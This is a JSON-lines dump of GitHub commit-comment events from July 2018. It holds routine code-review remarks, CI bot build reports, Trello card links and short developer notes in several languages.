{"id":"7959818032","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29694186,"position":null,"line":null,"path":null,"commit_id":"921ed7f4e939d789c3e5775c561681b0c30148f1","created_at":"2018-07-13T03:21:16Z","updated_at":"2018-07-13T03:21:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Code: Fix a part that calculate geometry score in topo GAN for pair of image instead using an representation average score for a whole batch](https://trello.com/c/Ct7lvKO4/59-code-fix-a-part-that-calculate-geometry-score-in-topo-gan-for-pair-of-image-instead-using-an-representation-average-score-for-a)"}},"created_at":"2018-07-13T03:21:16Z"}
{"id":"7959818843","type":"CommitCommentEvent","actor":{"login":"forspy"},"repo":{"name":"forspy/share"},"payload":{"comment":{"id":29694187,"position":null,"line":null,"path":null,"commit_id":"504bb98cac2a1a439ae6229980c5f76118c6d403","created_at":"2018-07-13T03:21:37Z","updated_at":"2018-07-13T03:21:37Z","author_association":"OWNER","body":"shell排序：较远元素先排，快速减少大量无序情况"}},"created_at":"2018-07-13T03:21:37Z"}
{"id":"7959837208","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"adityasingh177/sawtooth-core"},"payload":{"comment":{"id":29694225,"position":110,"line":110,"path":"rest_api/tests/api_test/base.py","commit_id":"0d6a7fc01db6d041f84cec0868ca5d0867a74aac","created_at":"2018-07-13T03:29:08Z","updated_at":"2018-07-13T03:29:08Z","author_association":"NONE","body":"too many asserts in this function and file as a whole, not sure if so many checks are required. \r\none general comment for asserts -- if assert fails there should be a proper log message what went wrong."}},"created_at":"2018-07-13T03:29:08Z"}
{"id":"7959840159","type":"CommitCommentEvent","actor":{"login":"Smangaliso007"},"repo":{"name":"Smangaliso007/Third-Attempt"},"payload":{"comment":{"id":29694233,"position":null,"line":null,"path":null,"commit_id":"57fdaadd735c55ee23e6637a5d344cf0c65f4c12","created_at":"2018-07-13T03:30:19Z","updated_at":"2018-07-13T03:30:19Z","author_association":"OWNER","body":"The FOOTER IS ALSO NOT STICKING TO THE BOTTOM"}},"created_at":"2018-07-13T03:30:19Z"}
{"id":"7959841665","type":"CommitCommentEvent","actor":{"login":"mrhut10"},"repo":{"name":"James-Yu/LaTeX-Workshop"},"payload":{"comment":{"id":29694236,"position":null,"line":null,"path":null,"commit_id":"526d342a85be3aaaccf653df98f368ce695aef24","created_at":"2018-07-13T03:30:54Z","updated_at":"2018-07-13T03:30:54Z","author_association":"NONE","body":"@James-Yu \r\ndocker use makes me very excited.\r\n\r\nIs there a user-guide how to set up for use with docker???\r\n\r\nthank you in advanced."}},"created_at":"2018-07-13T03:30:54Z"}
{"id":"7959844781","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"adityasingh177/sawtooth-core"},"payload":{"comment":{"id":29694241,"position":88,"line":88,"path":"rest_api/tests/api_test/get/test_rest_api_get.py","commit_id":"0d6a7fc01db6d041f84cec0868ca5d0867a74aac","created_at":"2018-07-13T03:32:13Z","updated_at":"2018-07-13T03:32:13Z","author_association":"NONE","body":"dont use magic numbers, use macro or define values in different file. for eg: HTTP_PUT_RESP_ERROR = 60"}},"created_at":"2018-07-13T03:32:13Z"}
{"id":"7959851134","type":"CommitCommentEvent","actor":{"login":"ModDef"},"repo":{"name":"ModDef/HelloWorld"},"payload":{"comment":{"id":29694250,"position":2,"line":2,"path":"README.md","commit_id":"108ca92557d66d68bb219834c30d6a81ef771e38","created_at":"2018-07-13T03:34:25Z","updated_at":"2018-07-13T03:34:25Z","author_association":"OWNER","body":"//这是一次修改"}},"created_at":"2018-07-13T03:34:25Z"}
{"id":"7959852529","type":"CommitCommentEvent","actor":{"login":"Manusaran"},"repo":{"name":"Manusaran/Session1"},"payload":{"comment":{"id":29694255,"position":null,"line":null,"path":null,"commit_id":"6a7102e1d4056b2c0732f32a067b5e59dad6daaa","created_at":"2018-07-13T03:34:56Z","updated_at":"2018-07-13T03:34:56Z","author_association":"OWNER","body":"Retrore thill here"}},"created_at":"2018-07-13T03:34:56Z"}
{"id":"7959862687","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"adityasingh177/sawtooth-core"},"payload":{"comment":{"id":29694269,"position":353,"line":353,"path":"rest_api/tests/api_test/get/test_rest_api_get.py","commit_id":"0d6a7fc01db6d041f84cec0868ca5d0867a74aac","created_at":"2018-07-13T03:39:10Z","updated_at":"2018-07-13T03:39:10Z","author_association":"NONE","body":"same as prev comment , do not use magic numbers"}},"created_at":"2018-07-13T03:39:10Z"}
{"id":"7959866255","type":"CommitCommentEvent","actor":{"login":"Edgamer63"},"repo":{"name":"xtreme8000/BetterSpades"},"payload":{"comment":{"id":29694273,"position":null,"line":null,"path":null,"commit_id":"58b192587cfed225a71268227c1331825706077f","created_at":"2018-07-13T03:40:41Z","updated_at":"2018-07-13T03:40:41Z","author_association":"NONE","body":"Congrats, you've done a Very good job! :D ... I should recommend to add Master volume Setting :D .\r\n\r\nPD: it's quite similar to the style of a gui i've made recently, so if you want some graphic help, i'm a friend that you can ask for help :) ."}},"created_at":"2018-07-13T03:40:41Z"}
{"id":"7959870677","type":"CommitCommentEvent","actor":{"login":"kshvmdn"},"repo":{"name":"annygakh/annygakh.github.io"},"payload":{"comment":{"id":29694282,"position":null,"line":null,"path":null,"commit_id":"af09585ce545cd8cf7281f94aff8bb4f51e3f37b","created_at":"2018-07-13T03:42:36Z","updated_at":"2018-07-13T03:42:36Z","author_association":"NONE","body":"that kshvmdn guy sounds really smart"}},"created_at":"2018-07-13T03:42:36Z"}
{"id":"7959872857","type":"CommitCommentEvent","actor":{"login":"ITWhx"},"repo":{"name":"ITWhx/whxgit4"},"payload":{"comment":{"id":29694283,"position":null,"line":null,"path":null,"commit_id":"03b5157087eb6b00ad41bec83a421a1095f96173","created_at":"2018-07-13T03:43:32Z","updated_at":"2018-07-13T03:43:32Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-13T03:43:32Z"}
{"id":"7959873866","type":"CommitCommentEvent","actor":{"login":"spatel4140"},"repo":{"name":"spatel4140/bing-rewards"},"payload":{"comment":{"id":29694288,"position":6,"line":21,"path":"BingRewards/src/driver.py","commit_id":"2ebc6fdddfb0ee8e89cb5347285c80bec4a6c72c","created_at":"2018-07-13T03:43:56Z","updated_at":"2018-07-13T03:43:56Z","author_association":"OWNER","body":"It was something experimental I wanted to try to disable animations. But that explains why I never saw much of a difference in performance haha"}},"created_at":"2018-07-13T03:43:56Z"}
{"id":"7959882648","type":"CommitCommentEvent","actor":{"login":"joeduffy"},"repo":{"name":"pulumi/pulumi"},"payload":{"comment":{"id":29694317,"position":null,"line":null,"path":null,"commit_id":"89f2f8abb5e302855b33a17c4adff82af2c07975","created_at":"2018-07-13T03:47:21Z","updated_at":"2018-07-13T03:47:21Z","author_association":"MEMBER","body":"💥 "}},"created_at":"2018-07-13T03:47:21Z"}
{"id":"7959884876","type":"CommitCommentEvent","actor":{"login":"SantiagoSalas"},"repo":{"name":"SantiagoSalas/RepoSS2"},"payload":{"comment":{"id":29694321,"position":null,"line":null,"path":null,"commit_id":"a237bcbc409fdb4845967aaacae5d777212ecd70","created_at":"2018-07-13T03:48:18Z","updated_at":"2018-07-13T03:48:18Z","author_association":"OWNER","body":"PROGRAMA DESARROLLADO SEGUN LAS DIRECTRICES DEL CAPITULO 1 DE NATECAD - PYTHON\r\nSANTIAGO SALAS 7mo B"}},"created_at":"2018-07-13T03:48:18Z"}
{"id":"7959888404","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29694325,"position":null,"line":null,"path":null,"commit_id":"35329b2547abd28c5b6965a32aaa3dd2795f6345","created_at":"2018-07-13T03:49:49Z","updated_at":"2018-07-13T03:49:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-remove-h](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-remove-h).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-remove-h-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T03:49:49Z"}
{"id":"7959893153","type":"CommitCommentEvent","actor":{"login":"PrimeHelix"},"repo":{"name":"xmartlabs/XLPagerTabStrip"},"payload":{"comment":{"id":29694331,"position":null,"line":null,"path":null,"commit_id":"95f96be31d7760c1e83a05a5b097cd9dec9675b5","created_at":"2018-07-13T03:51:51Z","updated_at":"2018-07-13T03:51:51Z","author_association":"NONE","body":"would you make a tag 8.0.2 & update podspec version, so we can update from cocoapods"}},"created_at":"2018-07-13T03:51:51Z"}
{"id":"7959894618","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"adityasingh177/sawtooth-core"},"payload":{"comment":{"id":29694335,"position":272,"line":272,"path":"rest_api/tests/api_test/utils.py","commit_id":"0d6a7fc01db6d041f84cec0868ca5d0867a74aac","created_at":"2018-07-13T03:52:32Z","updated_at":"2018-07-13T03:52:32Z","author_association":"NONE","body":"loop back address is always 127.0.0.1 , not sure why getting loop back addr this way."}},"created_at":"2018-07-13T03:52:32Z"}
{"id":"7959895799","type":"CommitCommentEvent","actor":{"login":"rachitralli"},"repo":{"name":"rachitralli/keyboards"},"payload":{"comment":{"id":29694337,"position":null,"line":null,"path":null,"commit_id":"82d6109f65fbd64d656043785869faa624db782f","created_at":"2018-07-13T03:53:06Z","updated_at":"2018-07-13T03:53:06Z","author_association":"OWNER","body":"@MakaraSok why the rac_western_punjabi files are mixed up with this PR?"}},"created_at":"2018-07-13T03:53:06Z"}
{"id":"7959899808","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"adityasingh177/sawtooth-core"},"payload":{"comment":{"id":29694343,"position":300,"line":300,"path":"rest_api/tests/api_test/utils.py","commit_id":"0d6a7fc01db6d041f84cec0868ca5d0867a74aac","created_at":"2018-07-13T03:54:51Z","updated_at":"2018-07-13T03:54:51Z","author_association":"NONE","body":"don't hard code path , get the user name from env variable. use /home/$user"}},"created_at":"2018-07-13T03:54:51Z"}
{"id":"7959902171","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29694349,"position":null,"line":null,"path":null,"commit_id":"0e072464927cd386a88f2a556f5c14103dac9e75","created_at":"2018-07-13T03:55:49Z","updated_at":"2018-07-13T03:55:49Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-13T03:55:49Z"}
{"id":"7959905411","type":"CommitCommentEvent","actor":{"login":"wyquek71"},"repo":{"name":"wyquek71/Cats_Dogs"},"payload":{"comment":{"id":29694361,"position":null,"line":null,"path":null,"commit_id":"d7f6c8422ec17d1224bdec0b52e3c54316a843ac","created_at":"2018-07-13T03:57:11Z","updated_at":"2018-07-13T03:57:11Z","author_association":"OWNER","body":"Fastai library with architecture VGG16"}},"created_at":"2018-07-13T03:57:11Z"}
{"id":"7959909449","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"adityasingh177/sawtooth-core"},"payload":{"comment":{"id":29694365,"position":282,"line":282,"path":"rest_api/tests/api_test/utils.py","commit_id":"0d6a7fc01db6d041f84cec0868ca5d0867a74aac","created_at":"2018-07-13T03:58:50Z","updated_at":"2018-07-13T03:58:50Z","author_association":"NONE","body":"validator, settings-tp and others are started as part of systemd right, not sure why you are trying to start them again here."}},"created_at":"2018-07-13T03:58:50Z"}
{"id":"7959911259","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"adityasingh177/sawtooth-core"},"payload":{"comment":{"id":29694367,"position":293,"line":293,"path":"rest_api/tests/api_test/utils.py","commit_id":"0d6a7fc01db6d041f84cec0868ca5d0867a74aac","created_at":"2018-07-13T03:59:38Z","updated_at":"2018-07-13T03:59:38Z","author_association":"NONE","body":"since validator, settings-tp and others are started as part of systemd even if you kill them, the process is restarted."}},"created_at":"2018-07-13T03:59:38Z"}
{"id":"7959912166","type":"CommitCommentEvent","actor":{"login":"wrs123"},"repo":{"name":"wrs123/bh3moni"},"payload":{"comment":{"id":29694370,"position":null,"line":null,"path":null,"commit_id":"876e10bc632ae0a815970d0244d9a26ccbfc3d32","created_at":"2018-07-13T04:00:03Z","updated_at":"2018-07-13T04:00:03Z","author_association":"OWNER","body":"233"}},"created_at":"2018-07-13T04:00:03Z"}
{"id":"7959918302","type":"CommitCommentEvent","actor":{"login":"omggoat"},"repo":{"name":"omggoat/SpringRep"},"payload":{"comment":{"id":29694562,"position":null,"line":null,"path":null,"commit_id":"a6d75b165e8a5baab30bd4915c73f13485c979ee","created_at":"2018-07-13T04:02:21Z","updated_at":"2018-07-13T04:02:21Z","author_association":"OWNER","body":"代码修改 "}},"created_at":"2018-07-13T04:02:21Z"}
{"id":"7959932808","type":"CommitCommentEvent","actor":{"login":"Jhail114"},"repo":{"name":"S4kt1/___jhail___"},"payload":{"comment":{"id":29694590,"position":null,"line":null,"path":null,"commit_id":"ad41f187a822e49c9179acf46591f3dc506be336","created_at":"2018-07-13T04:08:47Z","updated_at":"2018-07-13T04:08:47Z","author_association":"NONE","body":"Gagal fokus"}},"created_at":"2018-07-13T04:08:47Z"}
{"id":"7959939522","type":"CommitCommentEvent","actor":{"login":"kencu"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29694599,"position":null,"line":null,"path":null,"commit_id":"7c03a30a700f7643c3899ee7094a43f13b5aeff9","created_at":"2018-07-13T04:11:55Z","updated_at":"2018-07-13T04:11:55Z","author_association":"CONTRIBUTOR","body":"Here's a reference <http://icodecode7.blogspot.com/2011/04/osx-lacks-memalign.html> of interest. It may also be possible at some point to make a `posix_memalign` replacement to add to something like `snowleopard_fixes` for leopard, if it comes to be desired enough..."}},"created_at":"2018-07-13T04:11:55Z"}
{"id":"7959948150","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29694623,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-13T04:15:53Z","updated_at":"2018-07-13T04:15:53Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-13T04:15:53Z"}
{"id":"7959950006","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29694625,"position":null,"line":null,"path":null,"commit_id":"ada8e10afc0918052a81797d18073be9b46416cc","created_at":"2018-07-13T04:16:43Z","updated_at":"2018-07-13T04:16:43Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checar responsividade das telas](https://trello.com/c/Ng1N616T/204-checar-responsividade-das-telas)"}},"created_at":"2018-07-13T04:16:43Z"}
{"id":"7959950278","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29694626,"position":null,"line":null,"path":null,"commit_id":"865097b1d0e257316ba9907c7e30aea8948513f1","created_at":"2018-07-13T04:16:51Z","updated_at":"2018-07-13T04:16:51Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checar responsividade das telas](https://trello.com/c/Ng1N616T/204-checar-responsividade-das-telas)"}},"created_at":"2018-07-13T04:16:51Z"}
{"id":"7959950496","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29694627,"position":null,"line":null,"path":null,"commit_id":"46e80633d1c82ffcf9af48305b7f29e76347eca4","created_at":"2018-07-13T04:16:57Z","updated_at":"2018-07-13T04:16:57Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checar responsividade das telas](https://trello.com/c/Ng1N616T/204-checar-responsividade-das-telas)"}},"created_at":"2018-07-13T04:16:57Z"}
{"id":"7959951530","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29694635,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-13T04:17:26Z","updated_at":"2018-07-13T04:17:26Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T04:17:26Z"}
{"id":"7959954430","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29694643,"position":4,"line":1433,"path":"nvchecker.ini","commit_id":"42d226dac9a6753aa58a1b8eb69609e8b209ac82","created_at":"2018-07-13T04:18:39Z","updated_at":"2018-07-13T04:18:39Z","author_association":"MEMBER","body":"Hey 不要把这些包加在我的名下，然后不要在我名下的包中间加上这个折叠标记\r\n去最后新建一个你自己的折叠标记，然后把你维护的包挪过去"}},"created_at":"2018-07-13T04:18:39Z"}
{"id":"7959959185","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29694648,"position":4,"line":1433,"path":"nvchecker.ini","commit_id":"42d226dac9a6753aa58a1b8eb69609e8b209ac82","created_at":"2018-07-13T04:20:46Z","updated_at":"2018-07-13T04:20:46Z","author_association":"MEMBER","body":"另外如果你想接管deepin-{wechat, qq-im, baidu-pan}我没意见"}},"created_at":"2018-07-13T04:20:46Z"}
{"id":"7959978917","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29694690,"position":null,"line":null,"path":null,"commit_id":"98b63b0ad3a3ed991ea3246c29828499a60d1e1e","created_at":"2018-07-13T04:29:56Z","updated_at":"2018-07-13T04:29:56Z","author_association":"MEMBER","body":"噗……"}},"created_at":"2018-07-13T04:29:56Z"}
{"id":"7959981182","type":"CommitCommentEvent","actor":{"login":"xxsp9999"},"repo":{"name":"xxsp9999/meetingmanagement"},"payload":{"comment":{"id":29694697,"position":null,"line":null,"path":null,"commit_id":"7f3e979c562842db0ee5db9a1760b87e363ca720","created_at":"2018-07-13T04:30:55Z","updated_at":"2018-07-13T04:30:55Z","author_association":"OWNER","body":"The project is based on the SSM framework."}},"created_at":"2018-07-13T04:30:55Z"}
{"id":"7959984739","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694717,"position":74,"line":75,"path":"TwitterProject/TwitterUser.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:32:37Z","updated_at":"2018-07-13T04:32:37Z","author_association":"NONE","body":"self.present thôi là dc rồi"}},"created_at":"2018-07-13T04:32:37Z"}
{"id":"7959985176","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694719,"position":74,"line":75,"path":"TwitterProject/TwitterUser.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:32:48Z","updated_at":"2018-07-13T04:32:48Z","author_association":"NONE","body":"self.present thôi là dc rồi"}},"created_at":"2018-07-13T04:32:48Z"}
{"id":"7959986513","type":"CommitCommentEvent","actor":{"login":"alifianurfadillah"},"repo":{"name":"marr15/simrs2"},"payload":{"comment":{"id":29694726,"position":null,"line":null,"path":null,"commit_id":"1acc7c1c817639c801b7f80c71adf49d3eace812","created_at":"2018-07-13T04:33:25Z","updated_at":"2018-07-13T04:33:25Z","author_association":"COLLABORATOR","body":"apa itu"}},"created_at":"2018-07-13T04:33:25Z"}
{"id":"7959987830","type":"CommitCommentEvent","actor":{"login":"xxsp9999"},"repo":{"name":"xxsp9999/meetingmanagement"},"payload":{"comment":{"id":29694730,"position":null,"line":null,"path":null,"commit_id":"8a3c1e7411005e69dc1d52af7bcc9267d8ea217d","created_at":"2018-07-13T04:34:03Z","updated_at":"2018-07-13T04:34:03Z","author_association":"OWNER","body":"The project is based on the SSM framework.If you first time to learn SSM framework,it's useful for you!"}},"created_at":"2018-07-13T04:34:03Z"}
{"id":"7959989038","type":"CommitCommentEvent","actor":{"login":"ethanhuang13"},"repo":{"name":"ethanhuang13/ladybug"},"payload":{"comment":{"id":29694734,"position":null,"line":null,"path":null,"commit_id":"7c5a1ae32fc6ccad13b7b36671be2a549be0640c","created_at":"2018-07-13T04:34:38Z","updated_at":"2018-07-13T04:34:38Z","author_association":"OWNER","body":"Also added OpenRadarAPITests"}},"created_at":"2018-07-13T04:34:38Z"}
{"id":"7959990342","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694737,"position":58,"line":60,"path":"TwitterProject/TwitterUser.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:35:15Z","updated_at":"2018-07-13T04:35:15Z","author_association":"NONE","body":"kiểu biến là URL thì đặt tên biến là imgUrl nhé"}},"created_at":"2018-07-13T04:35:15Z"}
{"id":"7959993018","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Devoxin/Lavalink.py"},"payload":{"comment":{"id":29694743,"position":null,"line":null,"path":null,"commit_id":"622c32dbae07a27848cc976958307ee9bd0f887f","created_at":"2018-07-13T04:36:30Z","updated_at":"2018-07-13T04:36:30Z","author_association":"OWNER","body":"Could probably do `data['state'].get('position')` so that `None`is returned if the key doesn't exist so the value is updated regardless "}},"created_at":"2018-07-13T04:36:30Z"}
{"id":"7959999288","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"lntdev/sawtooth-core"},"payload":{"comment":{"id":29694752,"position":39,"line":39,"path":"rest_api/tests/api_test/get_state_api.py","commit_id":"ec9427eff92240e1ed54852f1248c4f3ca147ec5","created_at":"2018-07-13T04:39:27Z","updated_at":"2018-07-13T04:39:27Z","author_association":"COLLABORATOR","body":"where is the check for 70 char length?"}},"created_at":"2018-07-13T04:39:27Z"}
{"id":"7960002339","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694758,"position":46,"line":49,"path":"TwitterProject/TwitterUser.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:40:56Z","updated_at":"2018-07-13T04:40:56Z","author_association":"NONE","body":"chỗ này em muốn mảng rỗng thì dùng hàm removeAll() chứ ko cần phải khởi tạo lại"}},"created_at":"2018-07-13T04:40:56Z"}
{"id":"7960004899","type":"CommitCommentEvent","actor":{"login":"xixian2106"},"repo":{"name":"xixian2106/rime-xhup-dict"},"payload":{"comment":{"id":29694762,"position":null,"line":null,"path":null,"commit_id":"80a2c251a22aeeed1e9943195c6951de295af4ef","created_at":"2018-07-13T04:42:08Z","updated_at":"2018-07-13T04:42:08Z","author_association":"OWNER","body":"连打方案取消修改"}},"created_at":"2018-07-13T04:42:08Z"}
{"id":"7960009966","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"lntdev/sawtooth-core"},"payload":{"comment":{"id":29694771,"position":49,"line":49,"path":"rest_api/tests/api_test/get_state_api.py","commit_id":"ec9427eff92240e1ed54852f1248c4f3ca147ec5","created_at":"2018-07-13T04:44:23Z","updated_at":"2018-07-13T04:44:23Z","author_association":"COLLABORATOR","body":"i am  not able to understand what is happening in this test case."}},"created_at":"2018-07-13T04:44:23Z"}
{"id":"7960010696","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694772,"position":80,"line":80,"path":"TwitterProject/Home.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:44:42Z","updated_at":"2018-07-13T04:44:42Z","author_association":"NONE","body":"nếu ViewController sắp push tới mà cùng Storyboard với ViewController e đang code\r\nthì dùng self.storyboard.instantiate... luôn cho ngắn"}},"created_at":"2018-07-13T04:44:42Z"}
{"id":"7960010950","type":"CommitCommentEvent","actor":{"login":"jgm"},"repo":{"name":"haskell-foundation/foundation"},"payload":{"comment":{"id":29694773,"position":47,"line":140,"path":"basement/basement.cabal","commit_id":"556736e5691ecc270a8a8d310b8772b6f07eabf8","created_at":"2018-07-13T04:44:50Z","updated_at":"2018-07-13T04:44:50Z","author_association":"NONE","body":"This way of ruling out ghc < 8.0 has some bad consequences.  Here's an example: https://travis-ci.org/jgm/pandoc/jobs/403223821.  With the release of the new basement and foundation versions, the pandoc build on ghc 7.10 now fails with a completely inscrutable error message:\r\n```\r\n\r\nFailed to install basement-0.0.8\r\nBuild log ( /home/travis/.cabal/logs/ghc-7.10.3/basement-0.0.8-2PVt7C9gE3I6tV29w6Noe2.log ):\r\ncabal: Entering directory '/tmp/cabal-tmp-3543/basement-0.0.8'\r\nConfiguring basement-0.0.8...\r\nBuilding basement-0.0.8...\r\ncabal: No executables and no library found. Nothing to do.\r\ncabal: Leaving directory '/tmp/cabal-tmp-3543/basement-0.0.8'\r\n```\r\nI think cabal should behave better in this case, but what seems to happen is that, instead of realizing that 0.0.8 won't work with this ghc version and looking for a different version, cabal selects this version, then gets confused because the library is marked unbuildable and there's no executable.  I believe that in the recent discussions around yaml, people decided that a better solution was to add a dependency on `base < 0` for ghc < 8.0.\r\nDiscussion here: https://www.reddit.com/r/haskell/comments/8uw9hw/psa_cabal_breaks_with_yaml0831_on_ghc_710_and/\r\n"}},"created_at":"2018-07-13T04:44:50Z"}
{"id":"7960011933","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694779,"position":66,"line":66,"path":"TwitterProject/Home.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:45:16Z","updated_at":"2018-07-13T04:45:16Z","author_association":"NONE","body":"đặt tên imgUrl nhé"}},"created_at":"2018-07-13T04:45:16Z"}
{"id":"7960015383","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694784,"position":17,"line":17,"path":"TwitterProject/Home.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:46:42Z","updated_at":"2018-07-13T04:46:42Z","author_association":"NONE","body":"tất cả các biến chỉ dùng cho file này thôi, ko gọi ở file khác, thì để private nhé"}},"created_at":"2018-07-13T04:46:42Z"}
{"id":"7960018660","type":"CommitCommentEvent","actor":{"login":"valcar3d"},"repo":{"name":"valcar3d/informaTec_db"},"payload":{"comment":{"id":29694786,"position":null,"line":null,"path":null,"commit_id":"ecfa5c8b90462bb3e9d5a93c54744f795efb7525","created_at":"2018-07-13T04:48:13Z","updated_at":"2018-07-13T04:48:13Z","author_association":"OWNER","body":"Base de datos original InformaTEC, es la primera versión antes de agregar los campos de base64"}},"created_at":"2018-07-13T04:48:13Z"}
{"id":"7960019010","type":"CommitCommentEvent","actor":{"login":"ducnv55"},"repo":{"name":"Huandv/TwitterProject"},"payload":{"comment":{"id":29694789,"position":19,"line":19,"path":"TwitterProject/Home.swift","commit_id":"2a9d64c5027c07de0b584306790ff1d9073f221b","created_at":"2018-07-13T04:48:24Z","updated_at":"2018-07-13T04:48:24Z","author_association":"NONE","body":"biến này là hằng số thì e có thể khai báo bên ngoài class (đặt dưới mấy dòng import ấy)\r\nđặt tên có ý nghĩa 1 chút, và theo định dạng hằng số\r\nVD: kTimelineUrl = \"...\""}},"created_at":"2018-07-13T04:48:24Z"}
